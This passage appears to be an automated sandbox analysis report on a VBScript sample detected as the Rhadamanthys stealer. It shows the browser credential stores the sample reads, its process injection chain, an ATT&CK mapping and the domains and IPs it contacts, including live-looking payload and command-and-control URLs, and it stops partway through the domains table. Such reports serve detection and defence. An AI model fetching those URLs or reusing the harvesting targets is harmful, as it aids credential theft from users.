                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416F959B0 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,23_3_00007DF416F959B0
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected RHADAMANTHYS Stealer
                        Source: Yara matchFile source: 00000016.00000003.2709177603.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000003.2704689744.0000000002540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000016.00000002.2802648641.0000000003040000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000003.2719430449.0000000024020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dirJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entriesJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\main\ms-language-packsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dirJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\safebrowsing\google4Jump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjbJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\921a1560-5524-44c0-8495-fce7014dcfbaJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-releaseJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadataJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\doomedJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibagJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2Jump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ProfilesJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\startupCacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldbJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\safebrowsingJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settingsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\thumbnailsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhiJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\defJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\f0479a66-61f1-42d6-a1ab-d023ed0adaa0Jump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest ResourcesJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\main\ms-language-packs\browserJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjfJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasmJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\NetworkJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfakJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\0absryc3.defaultJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\mainJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDBJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\main\ms-language-packs\browser\newtabJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldoomlJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\ff366d85-2475-4dfc-a5c6-01e0d6f59500Jump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                        Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                        Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                        Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior

                        Remote Access Functionality

                        barindex
                        Yara detected RHADAMANTHYS Stealer
                        Source: Yara matchFile source: 00000016.00000003.2709177603.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000003.2704689744.0000000002540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000016.00000002.2802648641.0000000003040000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000003.2719430449.0000000024020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416F959B0 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,23_3_00007DF416F959B0
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 34_2_0000028186D5D004 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,34_2_0000028186D5D004

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information221
                        Scripting                        		Valid Accounts11
                        Windows Management Instrumentation                        		221
                        Scripting                        		1
                        DLL Side-Loading                        		3
                        Obfuscated Files or Information                        		1
                        OS Credential Dumping                        		13
                        File and Directory Discovery                        		Remote Services1
                        Archive Collected Data                        		1
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Exploitation for Client Execution                        		1
                        DLL Side-Loading                        		1
                        Extra Window Memory Injection                        		2
                        Software Packing                        		21
                        Input Capture                        		224
                        System Information Discovery                        		Remote Desktop Protocol11
                        Data from Local System                        		21
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts2
                        Command and Scripting Interpreter                        		1
                        Create Account                        		512
                        Process Injection                        		1
                        DLL Side-Loading                        		Security Account Manager211
                        Security Software Discovery                        		SMB/Windows Admin Shares21
                        Input Capture                        		1
                        Non-Standard Port                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts2
                        PowerShell                        		Login HookLogin Hook1
                        Extra Window Memory Injection                        		NTDS131
                        Virtualization/Sandbox Evasion                        		Distributed Component Object ModelInput Capture2
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                        Masquerading                        		LSA Secrets2
                        Process Discovery                        		SSHKeylogging3
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts131
                        Virtualization/Sandbox Evasion                        		Cached Domain Credentials1
                        Application Window Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items512
                        Process Injection                        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577818 Sample: g8ix97hz.vbs Startdate: 18/12/2024 Architecture: WINDOWS Score: 100 61 www.tdejb.com 2->61 63 ts1.aco.net 2->63 65 7 other IPs or domains 2->65 77 Suricata IDS alerts for network traffic 2->77 79 Malicious sample detected (through community Yara rule) 2->79 81 Yara detected RHADAMANTHYS Stealer 2->81 83 6 other signatures 2->83 11 powershell.exe 18 2->11         started        14 wscript.exe 1 2->14         started        16 svchost.exe 1 1 2->16         started        signatures3 process4 dnsIp5 97 Early bird code injection technique detected 11->97 99 Writes to foreign memory regions 11->99 101 Found suspicious powershell code related to unpacking or dynamic code loading 11->101 103 Queues an APC in another process (thread injection) 11->103 19 msiexec.exe 1 6 11->19         started        22 conhost.exe 11->22         started        105 VBScript performs obfuscated calls to suspicious functions 14->105 107 Suspicious powershell command line found 14->107 109 Wscript starts Powershell (via cmd or directly) 14->109 111 Suspicious execution chain found 14->111 24 powershell.exe 14 18 14->24         started        27 WMIC.exe 1 14->27         started        55 127.0.0.1 unknown unknown 16->55 signatures6 process7 dnsIp8 85 Switches to a custom stack to bypass stack traces 19->85 29 svchost.exe 19->29         started        73 tdejb.com 202.71.109.228, 443, 49720, 49837 TMVADS-APTM-VADSDCHostingMY Malaysia 24->73 87 Found suspicious powershell code related to unpacking or dynamic code loading 24->87 33 conhost.exe 24->33         started        89 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 27->89 35 conhost.exe 27->35         started        signatures9 process10 dnsIp11 75 87.120.127.215, 3847, 49859, 49924 UNACS-AS-BG8000BurgasBG Bulgaria 29->75 113 System process connects to network (likely due to code injection or exploit) 29->113 115 Switches to a custom stack to bypass stack traces 29->115 37 svchost.exe 6 29->37         started        signatures12 process13 dnsIp14 67 time-a-g.nist.gov 129.6.15.28, 123, 61876 US-NATIONAL-INSTITUTE-OF-STANDARDS-AND-TECHNOLOGYUS United States 37->67 69 ntp1.hetzner.de 213.239.239.164, 123, 61876 HETZNER-ASDE Germany 37->69 71 4 other IPs or domains 37->71 91 Tries to harvest and steal browser information (history, passwords, etc) 37->91 41 wmpshare.exe 37->41         started        44 msedge.exe 5 189 37->44         started        46 chrome.exe 37->46         started        signatures15 process16 signatures17 93 Writes to foreign memory regions 41->93 95 Allocates memory in foreign processes 41->95 48 dllhost.exe 41->48         started        51 msedge.exe 44->51         started        53 chrome.exe 46->53         started        process18 dnsIp19 57 45.149.241.141, 443, 49975, 50001 UUNETUS Germany 48->57 59 chrome.cloudflare-dns.com 162.159.61.3, 443, 49934, 49935 CLOUDFLARENETUS United States 51->59

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        g8ix97hz.vbs5%ReversingLabs

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://127.0.0.1:%u/json/list?t=%u0%Avira URL Cloudsafe
                        http://www.tdejb.com0%Avira URL Cloudsafe
                        http://127.0.0.1:%u/json/list?t=%uws:exodus.jsExodusatomic.jsAtomicguarda.jsGuardainfinity.jsInfinit0%Avira URL Cloudsafe
                        https://www.tdejb.com/ef/ef.bin0%Avira URL Cloudsafe
                        http://www.microsoft.cyf0%Avira URL Cloudsafe
                        https://87.120.127.215:3847/6d41b386417b9c328d8/i4rtpd4n.psnut0%Avira URL Cloudsafe
                        https://www.tdejb.com/ef/ef.binGalisGrawww.puneet.ae/ef/ef.bin0%Avira URL Cloudsafe
                        http://tdejb.com0%Avira URL Cloudsafe
                        https://www.tdejb.com/ef/Skifterne.sea0%Avira URL Cloudsafe
                        https://www.arecosaldature.it/ef/Skifterne.sea0%Avira URL Cloudsafe
                        https://www.tdejb.com0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        time.cloudflare.com
                        		162.159.200.1
                        		truefalse
                          		high
                          chrome.cloudflare-dns.com
                          		162.159.61.3
                          		truefalse
                            		high
                            tdejb.com
                            		202.71.109.228
                            		truefalse
                              		unknown
                              ntp.time.in.ua
                              		62.149.0.30
                              		truefalse
                                		high
                                time-a-g.nist.gov
                                		129.6.15.28
                                		truefalse
                                  		high
                                  ts1.aco.net
                                  		193.171.23.163
                                  		truefalse
                                    		unknown
                                    fp2e7a.wpc.phicdn.net
                                    		192.229.221.95
                                    		truefalse
                                      		high
                                      time.facebook.com
                                      		129.134.29.123
